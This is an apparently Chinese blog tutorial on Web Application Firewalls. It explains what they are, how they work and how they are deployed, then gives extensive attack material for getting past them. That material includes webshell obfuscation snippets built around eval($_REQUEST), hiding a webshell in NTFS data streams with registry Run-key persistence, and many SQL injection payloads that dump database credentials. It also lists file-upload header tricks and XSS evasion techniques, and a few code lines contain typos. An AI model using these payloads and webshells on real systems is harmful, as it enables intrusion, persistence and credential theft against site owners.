[Web安全 网络安全]- Web应用防火墙(WAF)

文章目录:

一:前言

1.简介

[1.1 引入](#1.1 引入)

[1.2 定义](#1.2 定义)

[1.3 WAF和其他攻击的区别](#1.3 WAF和其他攻击的区别)

[1.4 WAF与防火墙的区别](#1.4 WAF与防火墙的区别)

2.主要功能

3.什么情况下使用waf

4.分类

5.工作原理

6.部署方式

7.WAF部署

[a 阿里云盾](#a 阿里云盾)

[b 安全狗](#b 安全狗)

[c 宝塔面板](#c 宝塔面板)

8.Webshell免杀

9.Webshell后门分析

二:绕过方法

1.WAF注入绕过

[1.1 WAF身份认证阶段的绕过](#1.1 WAF身份认证阶段的绕过)

[1.2 WAF数据包解析阶段的绕过](#1.2 WAF数据包解析阶段的绕过)

2.文件上传绕过WAF

3.XSS绕过WAF


一:前言

1.简介

1.1 引入

因为HTTP是一个开放的协议,如果我们的产品要对外提供用户服务,那Web服务一般部署运行在公网上,任何人都可以访问,所以天然就会成为黑客的攻击目标

1.2 定义

Web应用防护墙(Web Application Firewall)简称WAF
    是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品(服务器安全防护软件)
    WAF产品里集成了一定的检测规则,会对每个请求的内容根据生成的规则进行检测
    并对不符合安全规则的作出对应的防御处理,从而保证Web应用的安全性与合法性

    
    WAF通过监控、过滤和阻止恶意的HTTP请求和响应,确保Web应用程序的安全性和可用性
    它专注于保护Web应用程序层,可以检测和防御多种类型的Web攻击:如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等
    WAF还可以提供日志记录功能,用于记录和分析攻击、事件和正常应用程序行为

1.3 WAF和其他攻击的区别

WAF 是一种防御机制,旨在保护Web应用程序免受各种网络攻击

网络攻击 是一种恶意行为,试图破坏、窃取或篡改数据

WAF与其他网络攻击的区别
    性质不同:
        WAF是一种防御机制,旨在保护Web应用程序免受攻击
        网络攻击则是一种恶意行为,旨在破坏、窃取或篡改数据,或使系统无法正常工作
    作用方式不同:
        WAF通过配置安全策略、规则引擎等方式,自动检测和拦截恶意流量
        网络攻击则利用系统或应用程序的漏洞,或通过社会工程学等手段,试图绕过安全措施,达到攻击目的
    目标不同:
        WAF的目标是保护Web应用程序和数据的安全,确保用户能够正常使用Web服务
        网络攻击的目标则是破坏系统的完整性、可用性或保密性,或窃取敏感信息
    防御与攻击的关系:
        WAF是防御网络攻击的重要工具之一,它可以帮助组织识别和阻止多种类型的网络攻击
        网络攻击则是WAF需要防御的对象,WAF通过不断更新和改进其防御能力,以应对不断变化的网络威胁


WAF与其他网络安全工具的比较
    虽然WAF与其他网络安全工具(如网络防火墙、入侵检测系统IDS等)在保护网络安全方面都具有重要作用,但它们之间存在明显的差异:

    焦点不同:WAF专注于保护Web应用程序,主要关注Web层攻击;而其他网络安全工具可能涵盖更广泛的领域,如网络层攻击等
    层级不同:WAF工作在应用层,通过深入分析HTTP请求和响应来检测和防御攻击;而其他网络安全工具可能在不同层级进行操作,如网络防火墙在网络层工作
    检测方式不同:WAF通过正则表达式、规则引擎等方式检测Web攻击,关注特定的攻击模式;而其他网络安全工具可能使用不同的检测方式,如IDS使用特征匹配、异常检测等
    部署位置不同:WAF通常部署在Web服务器前端,与Web应用程序直接交互;而其他网络安全工具可以部署在不同的位置,如边界防火墙位于网络边界

1.4 WAF与防火墙的区别

一、定义与工作原理
    WAF
        定义:WAF是一种专门用于保护Web应用程序的安全防护措施
        工作原理:WAF通过监控、过滤和分析HTTP/HTTPS流量,识别和阻止恶意请求,从而保护Web应用程序免受各种网络攻击
    防火墙
        定义:防火墙是一种网络安全系统,旨在监控和控制网络流量,根据预定义的安全规则决定是否允许数据包的传输
        工作原理:防火墙通过检查数据包的源地址、目标地址、端口号和协议类型等信息,来判断数据包的合法性,并据此决定是否允许其通过

二、防护层面与目的
    WAF
        防护层面:WAF主要防护OSI模型的第7层,即应用层
        防护目的:WAF专注于保护Web应用程序免受常见的网络攻击,如SQL注入、跨站脚本(XSS)、跨站请求伪造(CSRF)等
    防火墙
        防护层面:防火墙主要防护OSI模型的第3层(网络层)和第4层(传输层)
        防护目的:防火墙旨在保护内部网络免受外部威胁,防止未经授权的访问,并在企业网络和互联网之间建立一道安全屏障

三、主要功能
    WAF
        SQL注防护:WAF能够检测并阻止SQL注入攻击,防止攻击者通过恶意SQL语句获取、修改或删除数据库中的数据。
        XSS防护:WAF能够识别并阻止XSS攻击,防止攻击者在Web页面中插入恶意脚本
        CSRF防护:WAF能够检测并阻止CSRF攻击,防止攻击者伪造用户请求
        应用层DDoS防护:WAF能够检测并缓解应用层DDoS攻击,通过流量限制、速率控制等措施保护Web应用程序
        安全日志记录和分析:WAF能够记录所有检测到的安全事件和攻击行为,提供详细的日志和报表
    防火墙
        流量过滤:防火墙通过预定义的安全规则来过滤网络流量,只允许合法的数据包通过
        阻止恶意攻击:防火墙能够识别和阻止各种网络攻击,如DDoS攻击、恶意软件等
        记录网络活动:防火墙能够记录网络中的各种活动,包括数据包的传输、访问尝试等
        访问控制:防火墙通过配置访问控制列表(ACLs)和规则集,精细地管理哪些用户、设备或应用可以访问特定的系统资源
        集中安全管理:防火墙可以作为一个集中的安全控制点,统一管理和监控网络中的安全策略、日志和事件

四、部署与应用
    WAF
        WAF可以部署在云平台或本地,适用于需要保护Web应用程序的各种场景
        WAF通常与Web服务器紧密集成,以确保对HTTP/HTTPS流量的实时监控和过滤
    防火墙
        防火墙可以部署在云平台和本地,适用于保护整个网络环境
        防火墙通常部署在网络的边界上,充当已知威胁和未知威胁之间的一道屏障

2.主要功能

木马主动防御及查杀:网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法,WEB木马检出率大于90%

流量监控:能够实时监测到每个网站的进出流量和总流量,以及每个应用程序池及网站的CPU占用情况

网站漏洞防御功能:可拦截GET、POST、COOKIES等方式的SQL注入,可对GET、POST、COOKIES分别定义特征码,以及可拦截XSS注入等行为

危险组件防护功能:全面拦截恶意代码对组件的调用权限,拦截IIS执行恶意程序,保护网站安全

.Net安全保护模块:快捷设置.Net安全模式,禁止.Net执行系统敏感函数,保障网站安全

双层防盗链链接模式:可以针对不同站点设置防盗链的过滤, 防止图片、桌面、软件、音乐、电影被人引用。如果发现请求者是盗用网站链接, 则自动重定向到错误处理页面

网站特定资源防下载:支持对doc、mdb、mdf、myd等特定资源的防下载保护,加入要保护的敏感资料的路径,即可防止敏感资料被下载

CC攻击防护:自主研发的独特抗攻击算法,高效的主动防御系统可有效防御CC攻击、流量攻击

网站流量保护:支持下载流量控制、下载线程控制。采用独创的线程控制和流量控制技术, 大大提高服务器性能, 保护网站流量

IP黑白名单
    全IP黑白名单功能允许用户设置个性化的IP信任列表,直接屏蔽或者允许指定IP访问网站
    同时,增加iP临时黑名单功能,以及实现了针对某个功能的iP白名单功能
    同时,爬虫白名单提供爬虫信任机制,在出现误拦截情况下,允许用户自定义爬虫信任

3.什么情况下使用waf

保护Web应用程序免受各种Web攻击

1.业务类型需求
    电子商务:电商网站具有庞大的用户群体和大量的交易数据,因此需要WAF来保护用户数据、防止支付欺诈和其他网络攻击
             WAF可以有效检测和阻止如SQL注入、跨站脚本攻击(XSS)等网络攻击,确保用户信息不被窃取
    金融服务:金融机构网站承载着大量的财务数据和敏感信息
             WAF能够加强网上银行、移动银行等在线服务的安全性,防范金融诈骗,保护客户数据和交易安全
    媒体和内容提供商:WAF可以防止盗链、恶意爬虫和其他攻击,从而保护内容的安全和版权
    政府和公共服务:政府网站、在线服务和电子政务系统的安全性对于国家和公众都至关重要
             WAF可以抵御各种网络攻击,保护政府机构网站免受黑客的破坏和非法篡改,维护公众利益
    医疗保健:医院、医疗机构和健康信息系统的敏感数据和隐私同样需要WAF的保护
    教育机构:学校、大学和在线教育平台的学和教师信息安全也至关重要,WAF能够保障校园网络和教育资源的安全,防止敏感信息泄露


2.特定场景需求
    保护关键业务系统:WAF可以保护企业ERP、CRM等关键业务系统免受外部攻击,确保业务正常运行
    应对高流量场景:硬件WAF通常具有高性能和低延迟,适用于高流量的Web应用程序
    提高可用性和性能:云WAF可以提供全球分布的节点,从而提高Web应用程序的可用性和性能


3.安全策略需求
    基于规则的检测:WAF通常采用基于规则的检测技术,通过预定义规则或自定义规则来检测并拦截恶意流量
    防止漏洞利用:WAF能够检测和拦截各种漏洞利用攻击,如SQL注入、XSS、CSRF等
    流量控制和访问控制:WAF可以通过安全策略来限制流量的来源、目标和类型,实现更精细的流量控制和访问控制


4.合规性需求
    在某些行业或地区,使用WAF可能符合特定的安全合规要求
    例如,金融行业、医疗行业等对于数据安全和隐私保护有严格的规定,使用WAF可以帮助这些行业满足合规要求

4.分类

硬件Waf:绿盟、安恒、启明、知道创宇等
    硬件WAF的价格一般比较昂贵,支持多种方式部署到Web服务器前端,识别外部的异常流量,并进行阻断拦截,为Web应用提供安全防护


软件Waf:安全狗、云锁、中间件自带的Waf模块
    软件WAF安装过程比较简单,需要安装到需要安全防护的web服务器上,以纯软件的方式实现


云WAF:阿里云、安全狗、知道创宇、安恒
    云WAF的维护成本低,不需要部署任何硬件设备,云WAF的拦截规则会实时更新
    对于部署了云WAF的网站,我们发出的数据请求首先会经过云WAF节点进行规则检测
    如果请求匹配到WAF拦截规则,则会被WAF进行拦截处理,对于正常、安全的请求则转发到真实Web服务器中进行响应处理


自定义WAF
    网站开发人员为了网站的安全,会在可能遭受攻击的地方增加一些安全防护代码,比如过滤敏感字符,对潜在的威胁的字符进行编码、转义等

5.工作原理

1.预处理
    预处理阶段首先在接收到数据请求流量时会先判断是否为HTTP/HTTPS请求,之后会查看此URL请求是否在白名单之内
    如果该URL请求在白名单列表里,直接交给后端Web服务器进行响应处理,对于不在白名单之内的对数据包解析后进入到规则检测部分

2.规则检测
    每一种WAF产品都有自己独特的检测规则体系,解析后的数据包会进入到检测体系中进行规则匹配,检查该数据请求是否符合规则,识别出恶意攻击行为

3.处理模块
    针对不同的检测结果,处理模块会做出不同的安全防御动作
    如果符合规则则交给后端Web服务器进行响应处理
    对于不符合规则的请求会执行相关的阻断、记录、告警处理
    不同的WAF产品会自定义不同的拦截警告页面

4.日志记录
    WAF在处理的过程中也会将拦截处理的日志记录下来,方便用户在后续中可以进行日志查看分析

6.部署方式

1.透明网桥(透明代理模式)
    工作原理:当Web客户端对服务器有连接请求时,TCP连接请求被WAF截取和监控
        WAF代理了Web客户端和服务器之间的会话,将会话分成了两段,并基于桥模式进行转发
        从Web客户端的角度看,它仍然是直接访问服务器,感知不到WAF的存在

    特点:对网络的改动最小,可以实现零配置部署
        另外,通过WAF的硬件Bypass功能,在设备出现故障或掉电时,可以不影响原有网络流量,只是WAF自身功能失效
        然而,这种部署方式下,网络的所有流量(HTTP和非HTTP)都经过WAF,对WAF的处理性能有一定要求,且无法实现服务器负载均衡功能


2.反向代理模式
    工作原理:将真实服务器的地址映射到反向代理服务器上,此时代理服务器对外表现为一个真实服务器
        当代理服务器收到HTTP的请求报文后,将该请求转发给其对应的真实服务器
        后台服务器接收到请求后将响应先发送给WAF设备,由WAF设备再将应答发送给客户端

    特点:需要对网络进行改动,配置相对复杂
        除了要配置WAF设备自身的地址和路由外,还需要在WAF上配置后台真实Web服务器的地址和虚地址的映射关系
        如果原来服务器地址是全局地址(没经过NAT转换),那么通常还需要改变原有服务器的IP地址以及DNS解析地址
        这种部署模式的优点是可以在WAF上同时实现负载均衡


3.镜像流量(端口镜像模式)
    工作原理:WAF旁路接在Web服务器上游的交换机上,使用交换机的端口镜像功能,将交换机端口上的HTTP流量镜像一份给WAF
        WAF只对HTTP流量进行监控和报警,不进行拦截阻断。对于WAF而言,流量只进不出

    特点:部署相对简单,对现有网络架构影响较小
        但是,需要确保镜像流量的实时性和准确性。此外,在这种模式下,WAF只能进行监控和报警,无法直接阻断异常流量


4.路由代理模式
    工作原理:与透明网桥模式类似,但工作在路由转发模式而非网桥模式。需要为WAF的转发接口配置IP地址以及路由

    特点:需要对网络进行简单改动,要设置WAF设备内网口和外网口的IP地址以及对应的路由
        工作在路由代理模式时,WAF可以直接作为Web服务器的网关,但存在单点故障问题,同时也要负责转发所有的流量
        这种工作模式也不支持服务器负载均衡功能
        然而,它能够对流经OSI应用层的数据进行分析,对其他层的流量不作控制,因此具有快速、方便、简单的特点

7.WAF部署

a 阿里云盾

购买云服务器 ECS 即可免费使用云盾的基础功能

b 安全狗

安全狗软件

1.关闭apache程序及httpd.exe进程

2.运行cmd,cd进入apache/bin文件夹目录            cd C:\phpStudy\Apache\bin
  执行httpd.exe -k install -n apache2.4.39      安全狗安装服务名称填写apache2.4.39
  打开apache,打开安全狗安装包进行安装            安装完成后点击安装安全狗插件

c 宝塔面板

宝塔面板 - 简单好用的Linux/Windows服务器运维管理面板

8.Webshell免杀

1.把马创建成涵数,后面只要调用涵数就行

2.变量覆盖

3.组合法

4.在线加密

5.文件包含
    <?php
         $filename = $_GET['filename']; 
        include($filename); 
    ?>

6.通过NTFS交换数据流文件实现文件隐藏
    echo hello>>test.txt:webshell.php            创建数据流文件
    dir/r                                        查看数据流文件
    notepad muma.php                             新建一个一句话木马文件
    通过命令 type muma.php>>test.txt:muma.php     创建新的交换数据流文件
    数据流文件执行方法:是直接在注册表中的run键下添加数据流文件的完整路径:HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
    建立键值"123" = %filepath%: %streamName%,下次系统启动时就会自动运行该隐藏文件

9.Webshell后门分析

1.抓包分析法

2.数据流量协议分析法

3.代码分析定位法

二:绕过方法

1.WAF注入绕过

白名单黑名单身份认证--数据包解析--规则判断--拦截

1.1 WAF身份认证阶段的绕过

伪造搜索引擎

老版本的WAF是有这个漏洞的,就是把User-Agent修改为搜索引擎,便可以绕过,进行sql注入等攻击
这里推荐一个火狐插件,可以修改User-Agent,叫User-Agent Switcher


点击你要添加的分组然后点击New User Agent...
输入User Agent信息然后点击确定
然后选择你要模拟的的User Agent
选择后刷新页面即可    
    也可以通过手工修改User-Agent, 在火狐浏览器地址栏输入"about:config",按下回车进入设置菜单
    找到"general.useragent.override",如果没有这一项,则点右键"新建"->"字符串", 将其值设为自己想要的UserAgent(如:Baiduspider)

    也可以用burp来修改User-Agent

伪造白名单特殊目录

360webscan脚本存在这个问题,就是判断是否为admin dede install等目录,如果是则不做拦截

    比如:www.spisec.com/pen/news.php?id=1 union select user,password from mysql.user

    可以改为:
        www.spisec.com/pen/news.php/admin?id=1 union select user,password from mysql.user
        或者
        www.spisec.com/pen/admin/..\news.php?id=1 union select user,password from mysql.user

直接攻击源站

这个方法可以用于安全宝、加速乐等云WAF,云WAF的原理通过DNS解析到云WAF,访问网站的流量要经过指定的DNS服务器解析,然后进入WAF节点进行过滤,最后访问原始服务器

如果我们能通过一些手段(比如c段、社工)找到原始的服务器地址,便可以绕过

1.2 WAF数据包解析阶段的绕过

编码绕过
    URL编码
    二次URL编码
    assert(base64_decode('cGhwaW5mbygpOw=='));
    其他编码:例如Unicode编码,Base64编码,Hex编码,ASCII编码等,十六进制编码


修改请求方式绕过:有些WAF同时接收GET方法和POST的方法,但只在GET方法中增加了过滤规则,可通过发送POST方法进行绕过
    GET /xxx/?id=1+and+sleep(4)
    POST/xxx/?id=1+and+sleep(4)


空格替换
    %0a
    %0a/**/      
    /*|%23--%23|*/
    空白符
    +
    -
    @
    !
    注释符/**/
    &
    ()
    ''
    2个空格


等号替换
    like   
    rlike


换行替换:%23%0a、%2d%2d%0a
    %0A     是url编码中的换行
    %23     是url编码中的 #


关键字替换   
    COMMAND                 |         WHAT TO USE INSTEAD
    @@version               |         version()
    concat()                |         concat_ws()
    group_concat()          |         concat_ws()


字符替换
    greatest                |         替换 > 
    least                   |         替换 <
    in                      |         替换 =
    between and             |         替换 =


逻辑符号替换
    and                     |         &&    
    or                      |         ||  
    xor                     |         |     
    not                     |         !


双写替换法
    http://www.***.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4...


使用大小写
    http://www.***.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....


%绕过
    ?id=1 union select 1, 2, 3 from admin
    ?id=1 union s%e%lect 1, 2, 3 from admin


%00截断
    ?a=1&id=1and sleep(3) 
    ?a=1%00.&id=1and sleep(3)


内联注释绕过
    ?id=1+and+sleep(3)+and+1=2
    ?id=1+and+/*!50001sleep(3)*/+and+1=2

    常见的用于注释的符号有哪些:/*/, -- , //, #, --+,-- -, ;,--a;/!50000xx*/


超大数据包绕过    
    ?id=1+and+sleep(3) 
    ?id=1+and+sleep(3) )+and+111111111=11111111111111111111


宽字节绕过:因为使用了GBK编码。为了防止sql注入,提交的单引号(%27)会进行转义处理,即在单引号前加上斜杠/'(%5C%27)
    正常payload:?id=1'and 1=1--+
    尝试直接提交转义后的单引号:?id=1%5C%27and 1=1--+   
        通常这样的提交会被视为无效,因为转义字符(\)和单引号(')已经被视为一个整体了,无法再闭合字符串 
    尝试宽字节绕过:?id=1%df%27and 1=1--+
        %df 是一个GBK编码(或其他宽字节编码)中的高字节
        攻击者希望这个高字节与后面的 %27(单引号)组合成一个合法的宽字节字符,从而绕过对单引号的转义处理


拼接
    变量拼接绕过
        //如果对phpinfo检测,可以把参数改为
        $a='php';$b='info';$c=$a.$b;$c();
    拼接免杀
        $a='ev';
        $b='al';
        $c=$a.$b;
        $d='c';
        $$d($_REQUEST['A']);
        //等价于eval($_REQUEST['A']);


函数绕过
    字符替换绕过:assert(str_replace('x','','sxyxsxtxexm("ipconfig")'));
    end免杀函数取数组最后一个元素:eval(end($_REQUEST['A']));        
    strcmp函数:比较两个值大小,相等返回0 后者比前者大返回-1 小返回1
        ?id=-1' union select srtcmp(ascii(substr(database(),0,1)),100) --+


函数免杀
    function abc($b){
        returb $b;
    }
    $a = abc("$_REQUEST['A']");
    eval($a);


类定义绕过
    class user{
        $name='';
        function __construct($name){
            $this->name=$name;
        }
        function __destruct(){
            eval($this->name);
        }
    }
    $a=new user($_REQUEST['A']);
    
        

利用WAF本身的功能绕过:假如你发现WAF会把"*"替换为空,那么你就可以利用这一特性来进行绕过
    http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4....


云waf伪造ip头   
    X-Originating-IP: 127.0.0.1
    X-Forwarded-For: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    X-Client-IP: 127.0.0.1

2.文件上传绕过WAF

文件名后缀绕过
    demo.php.xxx
    php.php


等号绕过:在filename后多添加两个等号
    filename==="1.php"


填充垃圾字符:在Content-Disposition字段后添加垃圾数据,来绕过对文件名的校验
    Content-Disposition:aaaaaaafrom-data;name="uploadtime";


突破绕过
    突破0,文件名前缀加[0x09]绕过
        Content-Disposition: form-data; name="filepath"; filename="[0x09]backlion.asp"
        Content-Type: text/html
    突破1,文件名去掉双引号绕过
        Content-Disposition: form-data; name="filepath"; filename=backlion.asp
        Content-Type: text/html
    突破2,添加一个filename的文件名参数,并赋值绕过,两个看哪一个可以过去
        Content-Disposition: form-data; name="filepath"; filename="backlion.asp";filename="test.jpg"
        Content-Type: text/html
    突破3,form变量改成f+orm组合绕过
        Content-Disposition: f+orm-data; name="filepath";filename="backlion.asp"
        Content-Type: text/html
    突破4 ,文件名后缀大小写绕过
        ConTent-Disposition: form-data; name="filepath"; filename="backlion.Asp"
        Content-Type: text/html
    突破5 ,去掉form-data变量绕过
        ConTent-Disposition: name="filepath"; filename="backlion.asp"
        Content-Type: text/html
    突破6,在Content-Disposition:后添加多个空格 或者在form-data;后添加多个空格绕过
        ConTent-Disposition: form-data                                 ; name="filepath"; filename="backlion.asp"
        Content-Type: text/html
        ConTent-Disposition:                                 form-data ; name="filepath"; filename="baclion.asp"
        Content-Type: text/html
    突破7 ,backlion.asp . (空格+.)绕过
        ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp ."
        Content-Type: text/html
    突破8 ,"回车换行,绕过
        ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp
        "
        Content-Type: text/html
    突破9 ,NTFS流 在文件名后加::$DATA绕过
        ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp::$DATA"
        Content-Type: text/html
        ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp::$DATA\0x00\fuck.asp0x00.jpg"
        Content-Type: text/html
    突破10,将Content-Type和ConTent-Disposition调换顺序位置绕过
        Content-Type: text/html
        ConTent-Disposition: form-data; name="filepath"; filename="backlion.asp"
    突破11,在文件名前缀加空格(tab键可替换)绕过
        Content-Disposition: form-data; name="filepath"; filename=    "backlion.asp"
        Content-Type: text/html
    突破12,在form-data加空格绕过
        Content-Disposition: form-data;      name="uploaded"; filename="backlion.asp"
        Content-Type: text/html
    突破13,在form-data的前后加上+绕过
        Content-Disposition: +form-data; name="filepath"; filename="backlion.asp"
        Content-Type: text/html
        Content-Disposition: form-data+; name="filepath"; filename="backlion.asp"
        Content-Type: text/html

3.XSS绕过WAF

大小写绕过
    将<script>标签变为<SCRIPT>或<sCRIpT>,将alert函数变为aLeRT或ALERT等


javascript伪协议
    JavaScript伪协议是一种在URL中嵌入JavaScript代码的方法
    例如,在<a>标签的href属性中,可以写入javascript:alert(1)来执行JavaScript代码
    值得注意的是,引号通常可以去掉,支持伪协议的属性还有lowsrc、bgsound、background、action、dynsrc等


没有分号
    在JavaScript中,语句通常以分号结尾
    然而,如果JavaScript引擎能够判断一条语句是完整的,并且结尾有换行符,那么就可以省略分号
    例如,将alert(1);变为alert(1)(没有分号),如果WAF没有考虑到这种情况,那么就可能无法检测到这条恶意语句


Flash
    虽然Flash技术已经逐渐被淘汰,但在一些旧的Web应用中仍然可能存在Flash插件。攻击者可以利用Flash中的漏洞来执行XSS攻击,并尝试绕过WAF的检测
    然而,随着Flash的逐渐淘汰,这种方法已经变得不那么常见了


HTML5 新标签
    HTML5引入了一些新的标签和属性,这些新特性可能会被WAF所忽略。攻击者可以利用这些新标签和属性来构造恶意payload,并尝试绕过WAF的检测
    例如,使用<audio>或<video>标签的onerror事件来执行恶意脚本


Fuzz进行测试
    Fuzz测试是一种自动化的测试方法,用于发现软件中的漏洞。攻击者可以使用Fuzz测试工具来生成大量的恶意payload,并尝试绕过WAF的检测
    通过不断尝试和修改payload,攻击者可能会发现WAF的漏洞或弱点,并利用它们来执行XSS攻击


双层标签绕过
    <div><script>alert(1)</script></div>这样的结构来隐藏恶意代码
相关推荐
独行soc30 分钟前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
fantasy_arch36 分钟前
CPU性能优化-磁盘空间和解析时间
网络·性能优化
Clockwiseee1 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash2 小时前
安全算法基础(一)
算法·安全
云云3212 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3212 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
是Dream呀2 小时前
Python从0到100(七十八):神经网络--从0开始搭建全连接网络和CNN网络
网络·python·神经网络
xcLeigh3 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n3 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏
kaixin_learn_qt_ing3 小时前
了解RPC
网络·网络协议·rpc